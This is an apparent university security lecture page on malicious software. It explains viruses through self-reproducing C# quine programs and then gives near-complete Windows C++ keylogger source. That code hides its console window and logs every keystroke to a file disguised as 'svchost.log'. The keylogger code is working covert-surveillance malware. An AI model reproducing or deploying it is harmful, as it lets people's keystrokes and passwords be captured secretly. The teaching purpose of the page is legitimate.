= Malicious Software = <> Although this includes a wide variety of software, and you should read chapter 10 in preparation for the exam, I'm going to concentrate on two types in this lecture: Viruses and Keyloggers. == Viruses == Viruses must be able to copy themselves verbatim onto other systems. The question is how? Can code (ascii or otherwise) make a copy of itself? See if you can devise a logical sequence of actions that will output the same sequence of actions. In general, the method used to create a quine in any programming language is to have, within the program, two pieces: (a) code used to do the actual printing and (b) data that represents the textual form of the code (e.g., progdata in the first C example below). The code functions by using the data to print the code (which makes sense since the data represents the textual form of the code), but it also uses the data, processed in a simple way (e.g., quote() below) to print the textual representation of the data itself. (see: http://en.wikipedia.org/wiki/Quine_%28computing%29) Here is one written in C#: {{{#!java using System; class Q { static void Main() { string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}"; Console.Write(string.Format(s, s, (char)34, (char)123, (char)125)); } } }}} To make it work perfectly, you need to reformat it as follows: {{{#!java using System;class Q{static void Main(){string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));}} }}} Does that look a bit esoteric? Look at a longer one, but one that is easier to follow: {{{#!java using System; class P { static void Main() { string[] S = { " Console.WriteLine(\"using System;\");", " Console.WriteLine(\"class P {\");", " Console.WriteLine(\" static void Main() {\");", "", " Console.WriteLine(\" string[] S = {\");", " foreach (string line in S) {", " string escapedLine = line.Replace(@\"\\\", @\"\\\\\")", " .Replace(\"\\\"\", \"\\\\\\\"\");", " Console.WriteLine(\"\\\"{0}\\\",\", escapedLine);", " }", " Console.WriteLine(\" };\");", "", " foreach (string line in S) Console.WriteLine(line);", "", " Console.WriteLine(\" }\");", " Console.WriteLine(\"}\");", }; Console.WriteLine("using System;"); Console.WriteLine("class P {"); Console.WriteLine(" static void Main() {"); Console.WriteLine(" string[] S = {"); foreach (string line in S) { string escapedLine = line.Replace(@"\", @"\\") .Replace("\"", "\\\""); Console.WriteLine("\"{0}\",", escapedLine); } Console.WriteLine(" };"); foreach (string line in S) Console.WriteLine(line); Console.WriteLine(" }"); Console.WriteLine("}"); } } }}} == Keyloggers == The following source code will get you started. To just download the examples use the links at the end of this section. {{{#!java int _tmain(int argc, _TCHAR* argv[]) { HWND stealth; /*creating stealth (window is not visible)*/ AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); int t=get_keys(); return t; } int get_keys(void) { short character; while(1) { for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen("svchost.log","a+"); if(file==NULL) { return 1; } if(file!=NULL) { if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { switch(character) { case VK_SPACE: fputc(' ',file); fclose(file); break; case VK_SHIFT: fputs("[SHIFT]",file); fclose(file); break; case VK_RETURN: fputs("\n[ENTER]",file); fclose(file); break; case VK_BACK: fputs("[BACKSPACE]",file); fclose(file); break; case VK_TAB: fputs("[TAB]",file); fclose(file); break; case VK_CONTROL: fputs("[CTRL]",file); fclose(file); break; case VK_DELETE: fputs("[DEL]",file); fclose(file); break; case VK_OEM_1: fputs("[;:]",file); fclose(file); break; case VK_OEM_2: fputs("[/?]",file); fclose(file); break; case VK_OEM_3: fputs("[`~]",file); fclose(file); break; case VK_OEM_4: fputs("[ [{ ]",file); fclose(file); break; case VK_OEM_5: fputs("[\\|]",file); fclose(file); break; case VK_OEM_6: fputs("[ ]} ]",file); fclose(file); break; case VK_OEM_7: fputs("['\"]",file); fclose(file); break; case VK_NUMPAD0: fputc('0',file); fclose(file); break; case VK_NUMPAD1: fputc('1',file); fclose(file); break; case VK_NUMPAD2: fputc('2',file); fclose(file); break; case VK_NUMPAD3: fputc('3',file); fclose(file); break; case VK_NUMPAD4: fputc('4',file); fclose(file); break; case VK_NUMPAD5: fputc('5',file); fclose(file); break; case VK_NUMPAD6: fputc('6',file); fclose(file); break; case VK_NUMPAD7: fputc('7',file); fclose(file); break; case VK_NUMPAD8: fputc('8',file); fclose(file); break; case VK_NUMPAD9: fputc('9',file); fclose(file); break; case VK_CAPITAL: fputs("[CAPS LOCK]",file); fclose(file); break; default: fclose(file); break; } } } } } } return EXIT_SUCCESS; } }}} The source files are here: * [[attachment:KeyLogger.cpp]] * [[attachment:KeyLogger.h]] = Zipped Projects = You can get the Visual Studio 2010 projects in zipped format here: * Quine: [[attachment:Quine.zip]] (C# project) * Keylogger: [[attachment:KeyLogger.zip]] (C++ project)